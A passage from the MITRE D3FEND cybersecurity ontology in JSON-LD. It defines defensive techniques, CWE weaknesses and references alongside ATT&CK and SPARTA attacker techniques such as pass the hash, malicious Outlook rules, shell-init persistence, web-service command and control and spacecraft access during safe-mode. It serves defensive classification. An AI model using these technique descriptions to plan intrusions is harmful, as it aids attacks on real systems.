      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:ExecutableAllowlisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ExecutableAllowlisting",
        "d3f:PlatformHardening"
      ],
      "d3f:blocks": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:d3fend-id": "D3-EAL",
      "d3f:definition": "Using a digital signature to authenticate a file before opening.",
      "d3f:filters": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:kb-article": "## How it works\n\nThis technique is generic and there are numerous ways to compute and authenticate digital signatures.\nA digital certificate is generated from a private/public key pair issued by a certificate authority (CA). A hash of the file is encrypted using the private key. When the file is downloaded by another user, the user's system uses the public key to decrypt the hash and a new hash is created of the downloaded file. The hash decrypted by the public key is compared to the new hash and if there is a mismatch, further techniques, such as file deletion, file quarantine, or **Executable Blacklisting** may be invoked.\n\nThis technique may be invoked when deciding whether to load or execute a file.\n\n## Considerations\n\nOrganizations which download or create high volumes of software make management complex, in particular engineering or scientific organizations.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-EnhancingNetworkSecurityByPreventingUser-InitiatedMalwareExecution_"
        },
        {
          "@id": "d3f:Reference-ComputingApparatusWithAutomaticIntegrityReferenceGenerationAndMaintenance_Tripwire,Inc."
        }
      ],
      "d3f:synonym": "File Signature Authentication",
      "rdfs:label": "Executable Allowlisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:N13fba681f09349d3877c72b6d5792085"
        },
        {
          "@id": "_:N0b7fe9dfb02a4a73b688bee64af8389f"
        }
      ]
    },
    {
      "@id": "_:N13fba681f09349d3877c72b6d5792085",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N0b7fe9dfb02a4a73b688bee64af8389f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:DigitalText",
      "@type": "owl:Class",
      "d3f:definition": "Digital text is written content encoded in a digital format, allowing for storage, retrieval, and manipulation by electronic devices.",
      "rdfs:label": "Digital Text",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:T1137.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1137.005",
      "d3f:definition": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      },
      "rdfs:label": "Outlook Rules",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:Ndc908a29910242bb966d89887b2a6288"
        }
      ]
    },
    {
      "@id": "_:Ndc908a29910242bb966d89887b2a6288",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:Software-definedRadioEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving a software-defined radio (SDR) device indicating that the SDR's lifecycle state, operational state, configuration, data-streaming status, timing/reference status, or fault condition has changed.",
      "d3f:synonym": "SDR Event",
      "rdfs:label": "Software-defined Radio Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nf341088d0f5148f8bb352156e5e3cc0e"
        }
      ]
    },
    {
      "@id": "_:Nf341088d0f5148f8bb352156e5e3cc0e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "d3f:NetworkAgent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network agent is software installed on a network node or device that transmits information back to a collector agent or management system.  Kinds of network agents include SNMP Agent, IPMI agents, WBEM agents, and many proprietary agents capturing network monitoring and management information.",
      "d3f:synonym": "Exporter",
      "rdfs:label": "Network Agent",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:FileIntegrityMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileIntegrityMonitoring"
      ],
      "d3f:analyzes": {
        "@id": "d3f:File"
      },
      "d3f:d3fend-id": "D3-FIM",
      "d3f:definition": "Detecting any suspicious changes to files in a computer system.",
      "d3f:kb-article": "## How it Works\nThere are a number of tools in Windows and Unix that can monitor specific files in a system and generate alerts if any artifacts have been created, modified, or removed. They accomplish this by comparing the current artifacts to a previous snapshot.\n\nUnix - Unix systems have a file integrity checker tool called tripwire. Tripwire first initializes a database that serves as a basis for comparison and can then scan the system to compare the state of the current file system against the initial baseline database. Additionally, users can define policies that specify potential violations.\n\nWindows - In Microsoft Azure, file integrity monitoring can be enabled which can track file and registry key creation, removals, and modifications of specific files.\n\n## Considerations\nFiles can change constantly due to the non-static nature of a computer system. File Integrity Monitoring works best when pointed at a narrow scope of critical files to limit the number of unneccessary files that may be modified over the course of normal use. The accuracy and precision of defined policies also affect the efficacy of this technique.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FileIntegrityMonitoringinMicrosoftDefenderforCloud-Microsoft"
        },
        {
          "@id": "d3f:Reference-Tripwire"
        }
      ],
      "rdfs:label": "File Integrity Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N828431e24ea449c99207f47cc9648f7a"
        }
      ]
    },
    {
      "@id": "_:N828431e24ea449c99207f47cc9648f7a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DeadCodeElimination",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DeadCodeElimination"
      ],
      "d3f:d3fend-id": "D3-DCE",
      "d3f:definition": "Removing unreachable or \"dead code\" from compiled source code.",
      "d3f:kb-article": "## How it works\n\nDead code is code that is considered unreachable by normal program execution. Dead code can be created by adding code under a condition that never evaluates to true. Dead code should be removed since this type of code can produce unexpected results, if accidentally or maliciously forced to execute.\n\nDead code identification is typically performed by algorithms that implement program flows analysis looking for unreachable code. The dead code is eliminated by instructing compilers to remove the code through compiler flags, i.e., '-fdce' is used for Dead Code Elimination.\n\n## Considerations\n\nCode can also be deemed unreachable for certain run-time conditions. Different deployed systems and environments may contain some code that is unreachable for the given environment. This technique does not consider run-time conditions for unreachable code.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DeadCodeElimination"
      },
      "rdfs:label": "Dead Code Elimination",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationHardening"
      }
    },
    {
      "@id": "d3f:CCI-001087_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements an information system isolation boundary to minimize the number of nonsecurity functions included within the boundary containing security functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001087"
    },
    {
      "@id": "d3f:Reference-SecurityConsiderationsForExchangingFilesOverTheInternet",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/files/pubs/shared/itlb/itlbul2020-08.pdf"
      },
      "d3f:kb-abstract": "This Information Technology Laboratory (ITL) Bulletin provides recommendations from the National Institute of Standards and Technology (NIST) for securely exchanging files over the Internet. It also explores several of the technologies currently available for doing so to educate readers on options they have.",
      "d3f:kb-author": "Karen Scarfone, Matt Scholl, and Murugiah Souppaya",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:kb-reference-title": "NIST ITL Bulletin August 2020 - Security Considerations for Exchanging Files Over the Internet",
      "rdfs:label": "Reference - Security Considerations for Exchanging Files Over the Internet"
    },
    {
      "@id": "d3f:Reference-IdentificationOfTracerouteNodesAndAssociatedDevices",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10079749B2/en"
      },
      "d3f:kb-abstract": "Various embodiments pertain to communication network systems. In particular, various embodiments relate to multi-path probing in communication network systems that can be used to estimate the complete topology of the network. A method includes receiving data at a source node from a tracerouting probe in a network. The data includes information about at least one network node. The method also includes determining an identification for the at least one network node based on information. In addition, the method includes using the identification of the at least one network node to determine an identification of at least one device.",
      "d3f:kb-author": "Tomas KUBIK, Lan Li, Tomas RYBKA, Karlo ZATYLNY, Chris O'Brien",
      "d3f:kb-organization": "SolarWinds Worldwide LLC",
      "d3f:kb-reference-title": "Identification of traceroute nodes and associated devices",
      "rdfs:label": "Reference - Identification of traceroute nodes and associated devices"
    },
    {
      "@id": "d3f:DistributionProperties",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DP",
      "d3f:definition": "The properties derived from a probability distribution.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Probability distribution. [Link](https://en.wikipedia.org/wiki/Probability_distribution)",
      "rdfs:label": "Distribution Properties",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptiveStatistics"
      }
    },
    {
      "@id": "d3f:CWE-698",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-698",
      "d3f:definition": "The web application sends a redirect to another location, but instead of exiting, it executes additional code.",
      "d3f:synonym": "Redirect Without Exit",
      "rdfs:label": "Execution After Redirect (EAR)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-670"
        },
        {
          "@id": "d3f:CWE-705"
        }
      ]
    },
    {
      "@id": "d3f:T1516",
      "@type": "owl:Class",
      "d3f:attack-id": "T1516",
      "d3f:definition": "A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android's accessibility APIs.",
      "rdfs:label": "Input Injection - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Input Injection"
    },
    {
      "@id": "d3f:M1048",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "\"Sandboxing\" is often used to describe a detection environment which includes some forms of analysis (see D3-DA.)\"  Many forms of isolation (e.g., quarantining) are more static in nature and simply limit software's access to system resources.",
      "d3f:related": [
        {
          "@id": "d3f:DynamicAnalysis"
        },
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:SystemCallFiltering"
        }
      ],
      "rdfs:label": "Application Isolation and Sandboxing"
    },
    {
      "@id": "d3f:CWE-672",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-672",
      "d3f:definition": "The product uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked.",
      "rdfs:label": "Operation on a Resource after Expiration or Release",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-666"
      }
    },
    {
      "@id": "d3f:CWE-760",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-760",
      "d3f:definition": "The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product uses a predictable salt as part of the input.",
      "rdfs:label": "Use of a One-Way Hash with a Predictable Salt",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-916"
      }
    },
    {
      "@id": "d3f:URLReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:URLReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:URL"
      },
      "d3f:d3fend-id": "D3-URA",
      "d3f:definition": "Analyzing the reputation of a URL.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Finding_phishing_sites"
      },
      "rdfs:label": "URL Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierReputationAnalysis"
        },
        {
          "@id": "_:N7f5e1ca45dad4cfb815f9d34d5f8fdae"
        }
      ]
    },
    {
      "@id": "_:N7f5e1ca45dad4cfb815f9d34d5f8fdae",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:T1127.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1127.003",
      "d3f:definition": "Adversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio.(Citation: JamPlus manual)",
      "rdfs:label": "JamPlus",
      "rdfs:subClassOf": {
        "@id": "d3f:T1127"
      }
    },
    {
      "@id": "d3f:CWE-1107",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1107",
      "d3f:definition": "The source code uses symbolic constants, but it does not sufficiently place the definitions of these constants into a more centralized or isolated location.",
      "rdfs:label": "Insufficient Isolation of Symbolic Constant Definitions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:CWE-248",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-248",
      "d3f:definition": "An exception is thrown from a function, but it is not caught.",
      "rdfs:label": "Uncaught Exception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-705"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:narrower",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x narrower y: The entity x represents a more specific or focused concept than entity y.",
      "rdfs:label": "narrower",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:T1565.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1565.003",
      "d3f:definition": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.",
      "d3f:may-modify": {
        "@id": "d3f:ExecutableFile"
      },
      "rdfs:label": "Runtime Data Manipulation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1565"
        },
        {
          "@id": "_:Nd3cd822b5c8f4fadb183d34481262fbb"
        }
      ]
    },
    {
      "@id": "_:Nd3cd822b5c8f4fadb183d34481262fbb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-08-001%3ANTFSAlternateDataStreamExecution-SystemUtilities_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-08-001/"
      },
      "d3f:kb-abstract": "NTFS Alternate Data Streams (ADSs) may be used by adversaries as a means of evading security tools by storing malicious data or binaries in file attribute metadata. ADSs are also powerful because they can be directly executed by various Windows tools; accordingly, this analytic looks at common ways of executing ADSs using system utilities such as powershell.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-08-001: NTFS Alternate Data Stream Execution - System Utilities",
      "rdfs:label": "Reference - CAR-2020-08-001: NTFS Alternate Data Stream Execution - System Utilities - MITRE"
    },
    {
      "@id": "d3f:CWE-609",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-609",
      "d3f:definition": "The product uses double-checked locking to access a resource without the overhead of explicit synchronization, but the locking is insufficient.",
      "rdfs:label": "Double-Checked Locking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:CWE-766",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-766",
      "d3f:definition": "The product declares a critical variable, field, or member to be public when intended security policy requires it to be private.",
      "rdfs:label": "Critical Data Element Declared Public",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1061"
        },
        {
          "@id": "d3f:CWE-732"
        }
      ]
    },
    {
      "@id": "d3f:T1596.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.004",
      "d3f:definition": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.",
      "rdfs:label": "CDNs",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:LoadLibraryEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process dynamically loads a library or module into its memory space, extending its capabilities.",
      "rdfs:label": "Load Library Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/module_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:Ne81238ffbbe54d67862ce82a233ae833"
        },
        {
          "@id": "_:N8e064bb233ac4b4580e64bf23deb10eb"
        }
      ]
    },
    {
      "@id": "_:Ne81238ffbbe54d67862ce82a233ae833",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N8e064bb233ac4b4580e64bf23deb10eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-924",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-924",
      "d3f:definition": "The product establishes a communication channel with an endpoint and receives a message from that endpoint, but it does not sufficiently ensure that the message was not modified during transmission.",
      "rdfs:label": "Improper Enforcement of Message Integrity During Transmission in a Communication Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:obfuscates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x obfuscates y: The technique x makes the digital artifact y unclear or obscure.  Typically obfuscation is a way to hide a digital artifact from discovery, use, or both.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00942245-v"
      },
      "rdfs:label": "obfuscates",
      "rdfs:seeAlso": {
        "@id": "dbr:Obfuscation_(software)"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:evicts"
        },
        {
          "@id": "d3f:modifies"
        }
      ]
    },
    {
      "@id": "d3f:T1399",
      "@type": "owl:Class",
      "d3f:attack-id": "T1399",
      "d3f:definition": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Modify Trusted Execution Environment - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Modify Trusted Execution Environment"
    },
    {
      "@id": "d3f:ApplicationProcessConfiguration",
      "@type": "owl:Class",
      "d3f:definition": "The current configuration of an application process, stored in memory. It may have been sourced from other types of application configurations, e.g. Application Configuration Files or Application Configuration Database Records.",
      "rdfs:label": "Application Process Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:T1550.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1550.002",
      "d3f:creates": {
        "@id": "d3f:Authentication"
      },
      "d3f:definition": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.",
      "rdfs:label": "Pass the Hash",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1550"
        },
        {
          "@id": "_:N0ee30cc05f014306908371ccb119046c"
        }
      ]
    },
    {
      "@id": "_:N0ee30cc05f014306908371ccb119046c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:IA-0010",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0010",
      "d3f:definition": "Adversaries time their first execution to coincide with safe-mode, when the vehicle prioritizes survival and recovery. In many designs, safe-mode reconfigures attitude, reduces payload activity, lowers data rates, and enables contingency dictionaries or maintenance procedures that are dormant in nominal operations. Authentication, rate/size limits, command interlocks, and anti-replay handling may differ; some implementations reset counters, relax timetag screening, accept broader command sets, or activate alternate receivers and beacons to improve commandability. Ground behavior also shifts: extended passes, emergency scheduling, and atypical station use create predictable windows. An attacker who understands these patterns can present syntactically valid traffic that aligns with safe-mode expectations, maintenance loads, recovery scripts, table edits, or reboot/patch sequences, so the first accepted action appears consistent with fault recovery rather than intrusion.",
      "rdfs:label": "Unauthorized Access During Safe-Mode - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0010/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Unauthorized Access During Safe-Mode"
    },
    {
      "@id": "d3f:restricts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x restricts y: The entity x bounds the use of entity y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00234091-v"
      },
      "rdfs:label": "restricts",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:isolates"
        }
      ]
    },
    {
      "@id": "d3f:LinuxOpenAt2ArgumentO_CREAT",
      "@type": "owl:Class",
      "d3f:definition": "Create a regular file. Extension of Linux Openat.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/openat2.2.html"
      },
      "rdfs:label": "Linux OpenAt2 Argument O_CREAT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:CAPECThing",
      "@type": "owl:Class",
      "rdfs:label": "CAPEC Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThreatModelThing"
      }
    },
    {
      "@id": "d3f:DecoyObject",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyObject"
      ],
      "d3f:d3fend-id": "D3-DO",
      "d3f:definition": "A Decoy Object is created and deployed for the purposes of deceiving attackers.",
      "d3f:enables": {
        "@id": "d3f:Deceive"
      },
      "d3f:kb-article": "## Technique Overview\nDecoy objects are typically configured with detectable means of communication but do not have any legitimate business purpose. Any communication via or to these objects should be logged and analyzed to find potential indicators of compromise for a possible past or future attack against other systems.",
      "d3f:synonym": "Lure",
      "rdfs:label": "Decoy Object",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N8114d26fa3ef4e7b953dcdb60bad4c87"
        }
      ]
    },
    {
      "@id": "_:N8114d26fa3ef4e7b953dcdb60bad4c87",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Deceive"
      }
    },
    {
      "@id": "d3f:T1530",
      "@type": "owl:Class",
      "d3f:attack-id": "T1530",
      "d3f:definition": "Adversaries may access data from cloud storage.",
      "rdfs:label": "Data from Cloud Storage",
      "rdfs:subClassOf": {
        "@id": "d3f:CollectionTechnique"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-004%3AUnusualChildProcessForSpoolsv.ExeOrConnhost.Exe_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-004/"
      },
      "d3f:kb-abstract": "After gaining initial access to a system, threat actors attempt to escalate privileges as they may be operating within a lower privileged process which does not allow them to access protected information or carry out tasks which require higher permissions. A common way of escalating privileges in a system is by externally invoking and exploiting spoolsv or connhost executables, both of which are legitimate Windows applications. This query searches for an invocation of either of these executables by a user, thus alerting us of any potentially malicious activity.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-004: Unusual Child Process for Spoolsv.Exe or Connhost.Exe",
      "rdfs:label": "Reference - CAR-2021-01-004: Unusual Child Process for Spoolsv.Exe or Connhost.Exe - MITRE"
    },
    {
      "@id": "d3f:FTPRenameEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where files or directories on an FTP server are renamed, modifying their identifiers without altering their content or location.",
      "rdfs:label": "FTP Rename Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FTPEvent"
        },
        {
          "@id": "_:N246df48abcec47b594a048d2dd9d9b12"
        }
      ]
    },
    {
      "@id": "_:N246df48abcec47b594a048d2dd9d9b12",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FTPPutEvent"
      }
    },
    {
      "@id": "d3f:Reference-OverviewOfTheSeccompSandbox",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://code.google.com/archive/p/seccompsandbox/wikis/overview.wiki"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:kb-reference-title": "Overview of the seccomp sandbox",
      "rdfs:label": "Reference - Overview of the seccomp sandbox"
    },
    {
      "@id": "d3f:CWE-807",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-807",
      "d3f:definition": "The product uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.",
      "rdfs:label": "Reliance on Untrusted Inputs in a Security Decision",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:TA0111",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Privilege Escalation - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Privilege Escalation"
    },
    {
      "@id": "d3f:T1102.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1102.003",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.",
      "rdfs:label": "One-Way Communication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1102"
      }
    },
    {
      "@id": "d3f:T1481.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1481.003",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to a compromised system without receiving return output. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.",
      "rdfs:label": "One-Way Communication - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1481"
      },
      "skos:prefLabel": "One-Way Communication"
    },
    {
      "@id": "d3f:T1546.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.004",
      "d3f:definition": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.",
      "d3f:modifies": {
        "@id": "d3f:UserInitConfigurationFile"
      },
